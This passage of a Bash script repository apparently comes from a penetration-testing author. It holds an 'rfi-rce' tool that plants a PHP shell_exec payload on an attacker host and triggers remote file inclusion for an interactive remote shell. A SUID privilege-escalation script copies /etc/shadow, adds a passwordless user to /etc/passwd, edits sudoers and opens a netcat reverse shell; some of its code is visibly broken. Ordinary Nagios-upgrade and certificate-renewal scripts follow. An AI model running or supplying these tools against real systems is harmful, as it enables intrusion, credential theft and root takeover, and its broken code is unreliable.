20 |                 echo "OsbornePro rfi-rce 1.0 ( https://osbornepro.com )"
21 |                 echo ""
22 |                 echo "USAGE: rfi-rce -f <attacker file> -u <url> -c <curl options>"
23 |                 echo ""
24 |                 echo "OPTIONS:"
25 |                 echo "  -h : Displays the help information for the command."
26 |                 echo "  -f : Defines full path to a file on the attacker machine containing the RCE code."
27 |                 echo "  -u : Defines the full path URL on the vulnerable machine including the file from the -f parameter"
28 |                 echo "  -c : Set options available in curl to adjust to a variety of situations"
29 |                 echo ""
30 |                 echo "EXAMPLES:"
31 |                 echo "  rfi-rce -f /var/www/html/evil.txt -u 'https://website.com/search.php?page=http://attacking-ip.com/evil.txt' -c --insecure"
32 |                 echo "  # This example contains the command entry variable in evil.txt on the attack machine which creates RCE on the target."
33 |                 echo ""
34 |                 exit
35 | fi
36 | 
37 | while getopts ":c:u:f:" OPT; do
38 |         case $OPT in
39 |                 u) url=$OPTARG;;
40 |                 f) file=$OPTARG;;
41 |                 c) curlopts=$OPTARG;;
42 |         esac
43 | done
44 | 
45 | if [[ -z $url ]]; then
46 |         printf "[!] URL was not defined\n"
47 |         exit
48 | fi
49 | 
50 | if [[ -f $file ]]; then 
51 |         while :; do 
52 |                 printf "[rfi-rce>] "
53 |                 read cmd
54 |                 printf "<?php print shell_exec(\"${cmd}\");?>" > ${file}
55 |                 curl ${curlopts} "${url}"
56 |                 printf "\n"
57 |         done
58 | fi
59 | 


--------------------------------------------------------------------------------
/shellshock.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/shellshock.png


--------------------------------------------------------------------------------
/suidcheck.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | # This script is for finding commands with root SUID permissions and printing info for possible exploitation
  4 | 
  5 | SUID=$(find / -perm -u=s -type f 2>/dev/null)
  6 | GUID=$(find / -user root -perm 2000 -print 2> /dev/null)
  7 | EXPLOIT_CMDS=(nmap vim find netcat less cp nano screen)
  8 | 
  9 | echo "=================================================================="
 10 | echo "|            LINUX COMMON PRIVESC CHECK RESULTS                  |"
 11 | echo "=================================================================="
 12 | 
 13 | for i in "${exploit_cmds[@]}"
 14 | do 
 15 | 	RESULTS=$(grep -q "${i}" <<< "$SUID" && printf "$i root method is possibly exploitable!\n" || printf "$i ""root method is not exploitable\n")
 16 | 	echo "${RESULTS[*]}"
 17 | done
 18 | 
 19 | 
 20 | echo "=================================================================="
 21 | echo "|           SUID File List Located in PWD File suid.txt          |"
 22 | echo "------------------------------------------------------------------"
 23 | echo "$SUID" > "$(pwd)/suid.txt" 
 24 | echo "=================================================================="
 25 | echo "|           GUID File List Located in PWD File guid.txt          |"
 26 | echo "=================================================================="
 27 | echo "$GUID" > "$(pwd)/guid.txt"
 28 | echo "=================================================================="
 29 | echo "|                   CRON JOBS ON MACHINE                         |"
 30 | echo "|----------------------------------------------------------------|"
 31 | echo "$(ls --color=auto -las /etc/cron.d)"
 32 | echo "=================================================================="
 33 | echo "|                CRON JOB SCRIPT CONTENTS                        |"
 34 | echo "------------------------------------------------------------------"
 35 | find /etc/cron.d -type f -exec cat {} \; | awk '$1 ~ /^[^;#]/' | sed G   
 36 | echo "=================================================================="
 37 | 
 38 | for ex in "$EXPLOIT_CMDS"; do
 39 | 	privesc_available=$(echo $RESULTS | grep -q "$ex root method is possibly exploitable!")
 40 | 	if [ $privesc_available ]; then
 41 | 		exploit_options=echo "Would you like to attempt privesc using $ex?  "
 42 | 		options=("Yes Attempt PrivEsc " "No I am Just Testing ")
 43 | 
 44 | 		select opt in "${options[@]}"
 45 | 		do
 46 | 			case $opt in
 47 | 				"Yes Attempt PrivEsc ")
 48 | 					echo "Attempting privesc using $ex SUID bit..."
 49 | 					;;
 50 | 				"No I am Just Testing ")
 51 | 					echo "you chose to not attempt $ex privesc."
 52 | 					break
 53 | 					;;
 54 | 			esac
 55 | 		done
 56 | 		
 57 | 		# cp suid privesc method
 58 | 		if [ $ex | grep "cp" ]
 59 | 		then
 60 | 			echo "Copy a users password hash from the /etc/shadow file and crack it or pass it"
 61 | 			sleep 5s
 62 | 			cp /etc/shadow /tmp/shadowread
 63 | 			cp /etc/passwd /tmp/passwdread
 64 | 			cp /etc/passwd /tmp/groupread
 65 | 			echo "pentester:*:1002:1003:,,,:/home/pentester:/bin/bash" >> /tmp/passwdread
 66 | 			echo "pentester:*:1003:" >> /tmp/groupread
 67 | 			cp /tmp/groupread /etc/group
 68 | 			cp /tmp/passwdread /etc/passwd
 69 | 			echo "Username: pentester"
 70 | 			echo "No password set for pentester. Password must be set. "
 71 | 			passwd pentester
 72 | 			echo "If the passwd command above did not work in setting the password try the below command and then su as pentester."
 73 | 			echo "openssl passwd -1 -salt pentester P@ssw0rd1!"
 74 | 		fi
 75 | 		
 76 | 		# find suid privesc method
 77 | 		if [ $ex | grep "find" ]; then
 78 | 			touch test
 79 | 			find test -exec "whoami" \;
 80 | 			echo "Issue commands as root using the below syntax."
 81 | 			echo "find test -exec \"<command here> \" \\;"
 82 | 		fi
 83 | 
 84 | 		# less suid privesc method
 85 | 		if [ $ex | grep "less" ]; then
 86 | 			echo "Using the less SUID privesc method"
 87 | 			sudo install -m =xs $(which less) .
 88 | 			./less file_to_read
 89 | 		fi
 90 | 		
 91 | 		# nmap suid privesc method
 92 | 		if [ $ex | grep 'nmap' ]; then
 93 | 			echo "Enter bash commands in the nmap terminal by entering the below command once it is open."
 94 | 			echo "!sh"
 95 | 			sleep 5s
 96 | 			nmap --interactive	
 97 | 		fi
 98 | 
 99 | 		# netcat suid privesc method
100 | 		if [ $ex | grep ['netcat','nc'] ]
101 | 			echo "You will need to start a listener on your attack machine EXAMPLE: nc -lvnp 1337"
102 | 			echo "Enter your attack machines IP address: "
103 | 			read RHOST
104 | 			echo "Enter the port your attack machine will listen on"
105 | 			read RPORT
106 | 			./nc -e /bin/sh $RHOST $RPORT
107 | 		fi
108 | 		
109 | 		# vim suid privesc method
110 | 		if [ $ex | /bin/grep "vim" ]; then
111 | 			ls -la --clor=auto /usr/bin/vim
112 | 			ls -la --color=auto /usr/bin/alternatives/vim
113 | 			chmod u+s /usr/bin/vim.basic
114 | 			echo "visudo command is going to run in 5 seconds"
115 | 			echo "Give "$(whoami)" sudo permissions by adding the following to the sudoers file."
116 | 			echo "$(whoami) ALL=(ALL:ALL) ALL"
117 | 			sleep 5s
118 | 			visudo 
119 | 		fi
120 | 
121 | 		# nano suid privesc method
122 | 		if [ $ex | grep "nano" ]; then
123 | 			echo "Copy the password hash from the shadow file and crack it or pass it."
124 | 			sleep 5s
125 | 			nano /etc/shadow
126 | 			echo 'Or try adding a wildcard character in the second field of the /etc/passwd file to remove a users existing password.'
127 | 			echo "You have 10 seconds to copy the below line to paste into the /etc/passwd file that is about to open for editing."
128 | 			echo "pentester:*:1002:1003:,,,:/home/pentester:/bin/bash"
129 | 			sleep 10s
130 | 			nano /etc/passwd
131 | 		fi
132 | 		
133 | 		# screen suid privesc method
134 | 		if [ $ex | grep "screen" ]; then
135 | 			echo "Using screen command to obtain root privilege"
136 | 			export TERM='vt100'
137 | 			screen -x root/root
138 | 		fi
139 | 	fi
140 | done
141 | 


--------------------------------------------------------------------------------
/update-nagios-core.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | START_DIR=$(pwd)
  3 | USAGE="
  4 | #===============================================#
  5 | #   ___     _                      ___          #
  6 | #  / _ \ __| |__  ___ _ _ _ _  ___| _ \_ _ ___  #
  7 | # | (_) (_-< '_ \/ _ \ '_| ' \/ -_)  _/ '_/ _ \ #
  8 | #  \___//__/_.__/\___/_| |_||_\___|_| |_| \___/ #
  9 | #-----------------------------------------------#
 10 | #      If you can't beat 'em, tech 'em!         #
 11 | #===============================================#
 12 | COMMAND:
 13 |     $0 v1.0 ( https://osbornepro.com/ )
 14 | 
 15 | SYNTAX:
 16 |     $0 [-h] -v <new version number>
 17 | 
 18 | DESCRIPTION:
 19 |     Used to update Nagios Core version 4.4.x to the version number that you specify
 20 | 
 21 | USAGE:
 22 |     $0 -v <string format is #.#.#>
 23 | 
 24 | OPTIONS:
 25 |     -h : Displays the help information for the command.
 26 |     -v : Set the new version to upgrade Nagios too
 27 | 
 28 | EXAMPLES:
 29 |     $0 -v 4.4.11
 30 |     # This example upgrades Nagios Core to verions 4.4.11
 31 | 
 32 | "
 33 | 
 34 | function allow_ctrlc {
 35 | 
 36 |         # Allow Ctrl+C to kill pingsweep
 37 |         trap '
 38 |           trap - INT # restore default INT handler
 39 |           kill -s INT "$$"
 40 |         ' INT
 41 | 
 42 | }  # End function allow_ctrlc
 43 | 
 44 | 
 45 | function print_usage {
 46 | 
 47 |         printf "$USAGE\n" >&2
 48 |         exit 1
 49 | 
 50 | }  # End function print_usage
 51 | 
 52 | if [[ "$1" == *"4.4."* ]]; then
 53 |     /bin/echo "[*] Nagios Core version compatible"
 54 | else
 55 |     /bin/echo "[x] Nagios Core Version required is 4.4.x"
 56 |     print_usage
 57 | fi
 58 | 
 59 | while [ ! -z "$1" ]; do
 60 |         case "$1" in
 61 |                 -v)
 62 |                     shift
 63 |                     NEWVERSION=$1
 64 |                     ;;
 65 |                 *)
 66 |                         print_usage
 67 |                     ;;
 68 |         esac
 69 | shift
 70 | done
 71 | 
 72 | 
 73 | echo "[*] Stopping Nagios service to change files"
 74 | systemctl stop nagios.service
 75 | 
 76 | 
 77 | CURRENTVERSION=$(/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg | grep -m 1 Nagios\ Core | cut -d' ' -f 3)
 78 | echo "[*] Downloading the latest version $NEWVERSION"
 79 | wget https://assets.nagios.com/downloads/nagioscore/releases/nagios-${NEWVERSION}.tar.gz -O /tmp/nagios-${NEWVERSION}.tar.gz
 80 | 
 81 | 
 82 | echo "[*] Extracting the downloaded compressed archive file"
 83 | tar xzf /tmp/nagios-${NEWVERSION}.tar.gz -C /usr/local/nagios-${NEWVERSION}
 84 | 
 85 | 
 86 | echo "[*] Getting the Nagios group and username"
 87 | NAGIOSGROUP=$(grep nagios_group /usr/local/nagios/etc/nagios.cfg | cut -d= -f 2)
 88 | NAGIOSUSER=$(grep nagios_user /usr/local/nagios/etc/nagios.cfg | cut -d= -f 2)
 89 | 
 90 | 
 91 | echo "[*] Build compilation files with nagios group ${NAGIOSGROUP}"
 92 | cd /usr/local/nagios-${NEWVERSION}
 93 | /usr/local/nagios-${NEWVERSION}/configure --with-command-group=${NAGIOSGROUP}
 94 | make all
 95 | make install
 96 | 
 97 | 
 98 | echo "[*] Rename the current nagios directory for backup. Waiting 10 seconds for opertaion to complete"
 99 | mv /usr/local/nagios /usr/local/nagios-${CURRENTVERSION}
100 | sleep 10s
101 | 
102 | 
103 | echo "[*] Rename the newly downloaded directory to the expected Nagios location"
104 | mv /usr/local/nagios-${NEWVERSION} /usr/local/nagios
105 | cp -r /usr/local/nagios-${CURRENTVERSION}/etc /usr/local/nagios/
106 | cp -r /usr/local/nagios-${CURRENTVERSION}/share /usr/local/nagios/
107 | cp -r /usr/local/nagios-${CURRENTVERSION}/bin /usr/local/nagios/
108 | cp -r /usr/local/nagios-${CURRENTVERSION}/sbin /usr/local/nagios/
109 | cp -r /usr/local/nagios-${CURRENTVERSION}/libexec /usr/local/nagios/
110 | cp -r /usr/local/nagios-${CURRENTVERSION}/nagiosgraph /usr/local/nagios/
111 | cp -r /usr/local/nagios-${CURRENTVERSION}/var /usr/local/nagios/
112 | 
113 | 
114 | /bin/echo "[*] Verifying file counts in old and new directory"
115 | OLDCOUNT=$(ls -1 /usr/local/nagios-${CURRENTVERSION}/ | wc -l)
116 | NEWCOUNT=$(ls -1 /usr/local/nagios | wc -l)
117 | if [ $OLDCOUNT == $NEWCOUNT ]; then
118 |     /bin/echo "[*] The number of files in the old directory matches the current directory count]"
119 | else
120 |     /bin/echo "[!] The number of files in the old directory is different than the new directory"
121 | fi
122 | 
123 | 
124 | echo "[*] Setting group and username permissions"
125 | chown -R ${NAGIOSUSER}:${NAGIOSGROUP} /usr/local/nagios
126 | 
127 | # UNCOMMENT THIS IF YOU ARE USING NAGIOS BPI ADD ON
128 | #echo "[*] Update NagiosBPI permissions"
129 | #chmod +x /usr/local/nagios/share/nagiosbpi/set_bpi_perms.sh
130 | #cd /usr/local/nagios/share/nagiosbpi
131 | #./set_bpi_perms.sh
132 | 
133 | 
134 | /bin/echo "[*] Verifying configuration"
135 | /usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg
136 | 
137 | 
138 | /bin/echo "[*] Resarting Nagios services"
139 | /bin/systemctl restart nagios.service httpd.service mariadb.service ndo2db.service
140 | 
141 | 
142 | /bin/echo "[*] Removing temporary files"
143 | /bin/rm -rf -- /tmp/nagios-${NEWVERSION}.tar.gz
144 | /bin/cd $START_DIR
145 | 


--------------------------------------------------------------------------------
/update-ssl-certificate.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/sh
  2 | #
  3 | # REQUIREMENTS
  4 | # - Set the below variables as applicable to you
  5 | # - openssl
  6 | # - curl
  7 | # - Microsfot Root Certificate Authority
  8 | # - Run script as root user
  9 | #
 10 | # This script is used to
 11 | # 1.) automatically create a CSR request
 12 | # 2.) Submit the request to your Microsoft Certificate Authority
 13 | # 3.) Backup your old SSL certificate
 14 | # 4.) Start using the newly issued certificate 
 15 | 
 16 | 
 17 | 
 18 | # The service is restarted at the end of the script using ```systemctl``` to ensure your newly issued certificate is used
 19 | SERVICE='apache2.service'
 20 | 
 21 | TEMPLATE='WebServer' # This is the name of your template. This will not have any spaces in the name
 22 | CA='root-ca.domain.com'
 23 | #USER='WindowsAdmin'
 24 | #PASS='Pass0rd123!'
 25 | # OR UNCOMMENT THE BELOW TWO LINES TO STATICALLY SET YOUR VALUES
 26 | read -p "Enter your username: " USER
 27 | read -s -p "Enter your password: " PASS
 28 | echo " "
 29 | # COMMENT OUT THE ABOVE 3 LINES TO STOP THE PROMPT AND USE YOUR STATIC VALUES
 30 | 
 31 | COUNTRY='US'
 32 | STATE='New Jersey'
 33 | LOCALITY='Newark'
 34 | ORGANIZATION'OsbornePro LLC.'
 35 | CN='hostname.domain.com'
 36 | KEYSIZE='2048'
 37 | 
 38 | read -p "Set location to save your certificate key EXAMPLE: /etc/pki/tls/private/key.key: " KEYFILE #KEYFILE="/etc/pki/tls/private/${CN}.key"
 39 | read -p "Set location to save your request file EXAMPLE /etc/pki/tls/request.req: " CSRFILE #CSRFILE="/etc/pki/tls/${CN}.csr"
 40 | read -p "Set location to save the certificate file EXAMPLE /etc/pki/tls/certs/cert.crt: " CERTFILE #CERTFILE="/etc/pki/tls/certs/${CN}.crt"
 41 | # COMMENT OUT THE ABOVE 3 LINES AND STATICALLY SET YOUR VALUES BELOW
 42 | #KEYFILE="/etc/pki/tls/private/${CN}.key"
 43 | #CSRFILE="/etc/pki/tls/${CN}.csr"
 44 | #CERTFILE="/etc/pki/tls/certs/${CN}.crt"
 45 | # UNCOMMENT THE ABOVE 3 LINES TO STOP THE PROMPT AND USE YOUR STATIC VALUES
 46 | 
 47 | 
 48 | # BACKUP OLD CERTIFICATE FILES
 49 | echo "[*] Backing up old CSR Request File"
 50 | mv "${CSRFILE}" "${CSRFILE}.old"
 51 | 
 52 | echo "[*] Backing up current Certificate file"
 53 | mv "${CERTFILE}" "${CERTFILE}.old"
 54 | 
 55 | echo "[*] Backing up Old Key File"
 56 | mv "${KEYFILE}" "${KEYFILE}.old"
 57 | 
 58 | 
 59 | # NEW CERTIFICATE CREATION
 60 | echo -e "[*] Generating private key"
 61 | openssl req -newkey rsa:$KEYSIZE -nodes -keyout $KEYFILE -out $CSRFILE -subj "/C=${COUNTRY}/ST=${STATE}/L=${LOCALITY}/O=${ORGANIZATION}/CN=${CN}"
 62 | 
 63 | if [ ! -f $KEYFILE ]; then
 64 |         echo "[*] Failed to create private key. Check your write permissions in /etc/pki/tls/private"
 65 | else
 66 |         CERT=$(cat $CSRFILE | tr -d '\n\r')
 67 |         DATA="Mode=newreq&CertRequest=${CERT}&C&TargetStoreFlags=0&SaveCert=yes"
 68 |         CERT=$(echo ${CERT} | sed 's/+/%2B/g')
 69 |         CERT=$(echo ${CERT} | tr -s ' ' '+')
 70 |         CERTATTRIB="CertificateTemplate:${TEMPLATE}%0D%0A"
 71 | 
 72 | 
 73 |         echo -e "[*] Requesting certificate from CA"
 74 |         OUTPUTLINK=$(curl -k -u "${USER}":${PASS} --ntlm "https://${CA}/certsrv/certfnsh.asp" -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H "Host: ${CA}" -H "Referer: https://${CA}/certsrv/certrqxt.asp" -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko' -H 'Content-Type: application/x-www-form-urlencoded' --data "Mode=newreq&CertRequest=${CERT}&CertAttrib=${CERTATTRIB}&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" | grep -A 1 'function handleGetCert() {' | tail -n 1 | cut -d '"' -f 2)
 75 |         CERTLINK="https://${CA}/certsrv/${OUTPUTLINK}"
 76 | 
 77 | 
 78 |         echo -e "[*] Retriving certificate: $CERTLINK"
 79 |         curl -k -u "${USER}":${PASS} --ntlm $CERTLINK -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H "Host: ${CA}" -H "Referer: https://${CA}/certsrv/certrqxt.asp" -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko' -H 'Content-Type: application/x-www-form-urlencoded' > $CERTFILE
 80 | 
 81 |         echo -e "[*] Verifying cert for $CN"
 82 |         openssl verify -verbose $CERTFILE
 83 |         if [ "0" -eq "$?" ] ;
 84 |             then
 85 |                 echo -e "[*] Successfully verified certificate."
 86 |                 exit 0
 87 |             else
 88 |                 echo -e "[*] Error code: $?. Stopping."
 89 |                 exit 1
 90 |         fi
 91 | 
 92 |         systemctl restart $SERVICE
 93 |         # Or if apache you can use the below script to ensure functionality before restarting the service
 94 |         # VALIDATE APACHE2 SERVICE
 95 |         #echo "[*] Restarting the web service"
 96 |         #RESULT=$(sudo apachectl configtest 2>&1)
 97 |         #
 98 |         #if echo $RESULT | grep -q "Syntax OK"; then
 99 |         #    systemctl restart $SERVICE
100 |         #fi
101 | 
102 | fi
103 | 


--------------------------------------------------------------------------------